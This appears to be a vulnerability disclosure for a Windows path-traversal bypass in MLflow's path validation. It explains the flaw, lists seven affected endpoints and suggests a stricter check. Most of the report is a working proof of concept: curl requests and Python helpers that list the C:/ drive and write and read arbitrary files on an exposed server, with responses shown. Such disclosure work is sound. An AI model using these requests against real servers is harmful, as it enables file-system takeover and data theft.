The validate_path_is_safe() function in /mlflow/server/handlers.py, introduced in PR #7891 on Feb 24th, 2023, does not account for the Windows absolute path format. It can therefore be bypassed on MLflow servers running on Windows hosts, exposing them to a number of high-impact directory traversals.
The code of the affected validate_path_is_safe() function can be seen below:
_OS_ALT_SEPS = [sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != "/"]


def validate_path_is_safe(path):
    """
    Validates that the specified path is safe to join with a trusted prefix. This is a security
    measure to prevent path traversal attacks.
    """
    if (
        any((s in path) for s in _OS_ALT_SEPS)
        or ".." in path.split(posixpath.sep)
        or posixpath.isabs(path)
    ):
        raise MlflowException(f"Invalid path: {path}", error_code=INVALID_PARAMETER_VALUE)
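The function implements 3 separate checks:
1. The path must not contain an OS-specific separator other than the forward slash (/): any((s in path) for s in _OS_ALT_SEPS)
2. The path must not contain a parent-directory component (..): ".." in path.split(posixpath.sep)
3. The path must not be a POSIX absolute path: posixpath.isabs(path)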
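To see what each check catches on its own, the three conditions can be pulled apart as in the sketch below. The check labels and the failed_checks() helper are hypothetical names introduced for illustration. The separator list is hard-coded to the value _OS_ALT_SEPS takes on Windows so that the sketch behaves the same on any platform.

```python
import posixpath

# On Windows, os.sep is "\\" and os.path.altsep is "/", so the advisory's
# _OS_ALT_SEPS evaluates to ["\\"]. It is hard-coded here (an assumption of
# this sketch) so the result does not depend on the host platform.
WINDOWS_ALT_SEPS = ["\\"]


def failed_checks(path):
    """Return the (hypothetical) labels of the checks that reject `path`."""
    failed = []
    if any(sep in path for sep in WINDOWS_ALT_SEPS):
        failed.append("alt-separator")
    if ".." in path.split(posixpath.sep):
        failed.append("parent-reference")
    if posixpath.isabs(path):
        failed.append("posix-absolute")
    return failed


for candidate in ["..\\secret.txt", "a/../../secret.txt", "/etc/passwd", "model/MLmodel"]:
    print(f"{candidate!r}: {failed_checks(candidate) or 'accepted'}")
```

Each of the first three inputs trips exactly one check, while an ordinary relative artifact path is accepted.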
By supplying an absolute Windows path with forward slash (/) separators, all the above checks can be effectively bypassed:
# Python 3.9.6 on Windows 10 Pro x64 Build 19045
>>> import os
>>> import posixpath
>>> test_path = 'C:/some/abs/path'
>>>
>>> _OS_ALT_SEPS = [sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != "/"]
>>>
>>> any((s in test_path) for s in _OS_ALT_SEPS)
False
>>> ".." in test_path.split(posixpath.sep)
False
>>> posixpath.isabs(test_path)
False
Consequently, an attacker can perform directory traversals in any request handler that uses validate_path_is_safe() to validate user-supplied paths.
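The reason a drive-letter path is dangerous once it passes validation can be shown with the standard library alone. The sketch below uses ntpath, which applies Windows path rules on any platform. The artifact root is a made-up value, and the assumption that the handlers combine the trusted prefix and the user path with an os.path.join-style call is mine, not something confirmed here.

```python
import ntpath      # Windows path semantics, importable on any platform
import posixpath

# Hypothetical artifact root, used only for illustration.
artifact_root = "C:\\mlruns\\0\\POC_RUN_ID\\artifacts"
user_path = "C:/temp/poc.txt"

# The validator only asks the POSIX question, which a drive-letter path passes.
print(posixpath.isabs(user_path))               # False
# Windows rules treat the same string as absolute.
print(ntpath.isabs(user_path))                  # True
# Joining an absolute path onto a prefix discards the prefix entirely.
print(ntpath.join(artifact_root, user_path))    # C:/temp/poc.txt
```

Under Windows join semantics the trusted prefix is dropped, so the resulting path is whatever the caller supplied.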
The validate_path_is_safe() function is used by 7 separate endpoints in the mlflow/server/handlers.py file, which allows the attacker to perform the following actions:
List directories:
  _list_artifacts()#910, mapped to GET /ajax-api/2.0/mlflow/artifacts/list
  _list_artifacts_mlflow_artifacts()#1707, mapped to GET /ajax-api/2.0/mlflow-artifacts/artifacts
Read files:
  get_artifact_handler()#545, mapped to GET /get-artifact
  _download_artifact()#1655, mapped to GET /ajax-api/2.0/mlflow-artifacts/artifacts/PATH
  get_model_version_artifact_handler()#1429, mapped to GET /model-versions/get-artifact
Write files:
  _upload_artifact()#1680, mapped to PUT /ajax-api/2.0/mlflow-artifacts/artifacts/PATH
Delete files:
  _delete_artifact_mlflow_artifacts()#1731, mapped to DELETE /ajax-api/2.0/mlflow-artifacts/artifacts
The combination of the above actions essentially gives an attacker full control over the server's file system and allows them to compromise the confidentiality, integrity and availability of the user data held on the MLflow server.
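One possible way to close the gap is to apply Windows path rules in addition to the POSIX ones, regardless of the host platform. The sketch below is illustrative only and is not the project's actual fix. The function name validate_path_is_safe_strict() and the InvalidPathError class (standing in for MlflowException) are hypothetical.

```python
import ntpath
import posixpath


class InvalidPathError(ValueError):
    """Stand-in for MlflowException in this sketch."""


def validate_path_is_safe_strict(path):
    """Reject paths that are unsafe under POSIX or Windows rules (illustrative)."""
    drive, _ = ntpath.splitdrive(path)
    if (
        "\\" in path                             # Windows separator, on any host
        or ".." in path.split(posixpath.sep)     # parent-directory component
        or posixpath.isabs(path)                 # POSIX absolute path
        or ntpath.isabs(path)                    # Windows absolute path
        or drive                                 # drive-relative path, e.g. "C:temp"
    ):
        raise InvalidPathError(f"Invalid path: {path}")
    return path


for candidate in ["model/MLmodel", "C:/temp/poc.txt", "C:temp"]:
    try:
        validate_path_is_safe_strict(candidate)
        print(f"{candidate!r}: accepted")
    except InvalidPathError as exc:
        print(f"{candidate!r}: rejected ({exc})")
```

The trade-off of this approach is that it also rejects legitimate POSIX file names whose second character is a colon, which may or may not be acceptable for artifact paths.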
Prerequisites: Python 3 installed on the machine.
Install the latest version of mlflow:
C:\Temp> pip install mlflow
Clone the mlflow repository into a local directory:
C:\Temp> git clone https://github.com/mlflow/mlflow
Run one of the example mlflow scripts, e.g. examples/shap/explainer_logging.py, to populate the mlruns directory:
C:\Temp> cd C:\Temp\mlflow\examples\shap
C:\Temp\mlflow\examples\shap> pip install scikit-learn shap matplotlib
C:\Temp\mlflow\examples\shap> python explainer_logging.py
Run the server on the Windows machine and expose it on all network interfaces:
C:\Temp\mlflow\examples\shap> mlflow server --host 0.0.0.0
Assuming that the Windows machine's external IP address is 10.0.0.1, store it in an environment variable on the attacking machine:
$ export MLFLOW_SERVER_IP=10.0.0.1
List the existing runs in the MLflow server. Use "experiment_ids": ["0"] to get the default experiment. Save the run_uuid value for later use:
# CURL request:
curl -X 'POST' -H 'Content-Type: application/json' -d '{"experiment_ids": ["0"]}' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/runs/search"
# Response:
{
  "runs": [
    {
      "info": {
        "run_uuid": "POC_RUN_ID",
        ...
      }
    }
  ]
}
Create a new model:
# CURL request:
curl -X 'POST' -H 'Content-Type: application/json' -d '{"name":"POC_MODEL_NAME"}' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/registered-models/create"
Create a new model version by supplying the previously obtained run ID:
# CURL request:
curl -X 'POST' -H 'Content-Type: application/json' -d '{"name":"POC_MODEL_NAME","source":"runs:/POC_RUN_ID"}' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/model-versions/create"
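The three setup requests above can also be scripted. The following is a minimal sketch using only the standard library. BASE_URL reuses the address assumed in the steps above, and post_json() and first_run_uuid() are hypothetical helper names. The requests are only built here, not sent.

```python
import json
import urllib.request

BASE_URL = "http://10.0.0.1:5000"  # server address assumed in the steps above


def post_json(endpoint, payload):
    """Build (but do not send) a JSON POST request to the MLflow AJAX API."""
    return urllib.request.Request(
        f"{BASE_URL}/ajax-api/2.0/mlflow/{endpoint}",
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def first_run_uuid(search_response_body):
    """Extract the first run_uuid from a runs/search response body."""
    return json.loads(search_response_body)["runs"][0]["info"]["run_uuid"]


search_runs = post_json("runs/search", {"experiment_ids": ["0"]})
create_model = post_json("registered-models/create", {"name": "POC_MODEL_NAME"})
create_version = post_json(
    "model-versions/create",
    {"name": "POC_MODEL_NAME", "source": "runs:/POC_RUN_ID"},
)

# To actually send a request: urllib.request.urlopen(search_runs).read()
```

In a real run, POC_RUN_ID would be replaced with the value returned by first_run_uuid() before the model version is created.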
Use the obtained IDs to trigger the following LFI actions:
List directories (path value is set to "C:/" in the examples below):
Request to /ajax-api/2.0/mlflow/artifacts/list:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/artifacts/list?run_uuid=POC_RUN_ID&path=C:/"
# Response:
{
  "root_uri": "file:///C:/Users/Strawberry/Desktop/projects/mlflow/examples/shap/mlruns/0/POC_RUN_ID/artifacts",
  "files": [
    {
      "path": "../../../../../../../../../..",
      "is_dir": true
    },
    {
      "path": "../../../../../../../../../../../Program Files",
      "is_dir": true
    },
    {
      "path": "../../../../../../../../../../../Windows",
      "is_dir": true
    },
    ...
  ]
}
Request to /ajax-api/2.0/mlflow-artifacts/artifacts:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"
# Response:
{
  "files": [
    {
      "path": "..",
      "is_dir": true
    },
    ...
    {
      "path": "Program Files",
      "is_dir": true
    },
    {
      "path": "Program Files (x86)",
      "is_dir": true
    },
    {
      "path": "ProgramData",
      "is_dir": true
    },
    {
      "path": "Recovery",
      "is_dir": true
    },
    {
      "path": "System Volume Information",
      "is_dir": true
    }
  ]
}
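The two listing requests and their responses can be handled programmatically as well. The sketch below builds the URLs and extracts directory names from a response body. BASE_URL, list_url() and listed_dirs() are hypothetical names. Note that urlencode percent-encodes the colon and slash in the path value, which should decode on the server to the same string the curl commands send.

```python
import json
from urllib.parse import urlencode

BASE_URL = "http://10.0.0.1:5000"  # server address assumed in the steps above


def list_url(endpoint, **params):
    """Build a listing URL with properly encoded query parameters."""
    return f"{BASE_URL}{endpoint}?{urlencode(params)}"


def listed_dirs(response_body):
    """Return the paths of all directory entries in a listing response."""
    body = json.loads(response_body)
    return [f["path"] for f in body.get("files", []) if f.get("is_dir")]


run_listing = list_url(
    "/ajax-api/2.0/mlflow/artifacts/list", run_uuid="POC_RUN_ID", path="C:/"
)
root_listing = list_url("/ajax-api/2.0/mlflow-artifacts/artifacts", path="C:/")
print(run_listing)
print(root_listing)

# Shortened sample of the second response shown above.
sample = '{"files": [{"path": "..", "is_dir": true}, {"path": "Program Files", "is_dir": true}]}'
print(listed_dirs(sample))
```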
Write files (path value is set to "C:/temp/poc.txt" in the example below):
Request to /ajax-api/2.0/mlflow-artifacts/artifacts/PATH:
# CURL request:
curl -X 'PUT' -d 'this is write poc' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts/C:/temp/poc.txt"
# Response:
{}
Read files (path value is set to "C:/temp/poc.txt" in the examples below):
Request to /get-artifact:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/get-artifact?path=C:/temp/poc.txt&run_uuid=POC_RUN_ID"
# Response:
this is write poc
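The write and read steps together form a round trip: the file is uploaded through one endpoint and read back through another. A minimal standard-library sketch of the two requests is shown below. BASE_URL and TARGET are illustrative constants, and the requests are only constructed, not sent.

```python
import urllib.request
from urllib.parse import urlencode

BASE_URL = "http://10.0.0.1:5000"  # server address assumed in the steps above
TARGET = "C:/temp/poc.txt"

# PUT with the target path embedded in the URL, as in the upload step.
write_req = urllib.request.Request(
    f"{BASE_URL}/ajax-api/2.0/mlflow-artifacts/artifacts/{TARGET}",
    data=b"this is write poc",
    method="PUT",
)

# GET with the target path passed as a query parameter.
read_req = urllib.request.Request(
    f"{BASE_URL}/get-artifact?" + urlencode({"path": TARGET, "run_uuid": "POC_RUN_ID"}),
    method="GET",
)

print(write_req.get_method(), write_req.full_url)
print(read_req.get_method(), read_req.full_url)

# To send them in order:
#   urllib.request.urlopen(write_req).read()
#   urllib.request.urlopen(read_req).read()
```

If the second response body matches the uploaded bytes, both the write and the read primitive are confirmed against the same file.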
Request to /ajax-api/2.0/mlflow-artifacts/artifacts/PATH. Could not be reproduced; the request returns the following error:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts/C:/temp/poc.txt"
# Response:
{"error_code": "INTERNAL_ERROR", "message": "The following failures occurred while downloading one or more artifacts from ./mlartifacts: {'C:/temp/poc.txt': 'SameFileError(\"\\'C:\\\\\\\\\\\\\\\\temp\\\\\\\\\\\\\\\\poc.txt\\' and \\'C:/temp/poc.txt\\' are the same file\")'}"}
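The SameFileError in this response is the exception shutil.copyfile raises when its source and destination resolve to the same file. A plausible reading, inferred from the error message rather than confirmed against the MLflow source, is that the download step ends up copying C:/temp/poc.txt onto itself under two different spellings. The sketch below reproduces that standard-library behaviour in a temporary directory.

```python
import os
import shutil
import tempfile

with tempfile.TemporaryDirectory() as tmp:
    target = os.path.join(tmp, "poc.txt")
    with open(target, "w") as fh:
        fh.write("this is write poc")

    # A second spelling of the same location, loosely mirroring the two
    # differently formatted paths in the error message.
    alias = os.path.join(tmp, ".", "poc.txt")
    try:
        shutil.copyfile(alias, target)
        outcome = "copied"
    except shutil.SameFileError as exc:
        outcome = f"SameFileError: {exc}"

print(outcome)
```

This suggests the failure is a side effect of how the file is copied, not of the path being rejected by validation.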
Request to /model-versions/get-artifact:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/model-versions/get-artifact?path=C:/Temp/poc.txt&run_uuid=POC_RUN_ID&name=POC_MODEL_NAME&version=1"
# Response:
this is write poc
Delete files (path value is set to "C:/temp/poc.txt" in the example below):
Request to /ajax-api/2.0/mlflow-artifacts/artifacts. Could not be reproduced; the request returns the following error:
# CURL request:
curl -X 'DELETE' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/temp/poc.txt"
# Response:
<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>